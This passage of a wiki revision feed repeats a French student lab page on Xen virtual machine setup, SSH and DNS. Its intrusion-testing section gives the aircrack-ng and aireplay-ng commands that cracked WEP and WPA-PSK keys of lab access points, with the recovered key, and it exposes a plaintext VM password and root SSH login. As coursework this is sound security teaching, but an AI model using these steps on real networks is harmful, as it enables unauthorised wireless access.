&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;/div&gt;</summary>
		<author><name>Rbonvale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56641</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56641"/>
				<updated>2021-11-29T16:26:04Z</updated>
		
		<summary type="html">&lt;p&gt;Rbonvale : /* DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
Tout d'abord on achète un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;/div&gt;</summary>
		<author><name>Rbonvale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56640</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56640"/>
				<updated>2021-11-29T16:25:52Z</updated>
		
		<summary type="html">&lt;p&gt;Rbonvale : /* DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
Tout d'abord on achète un nom de domaine, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;/div&gt;</summary>
		<author><name>Rbonvale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56638</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56638"/>
				<updated>2021-11-29T16:25:12Z</updated>
		
		<summary type="html">&lt;p&gt;Rbonvale : /* Connexion ssh */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
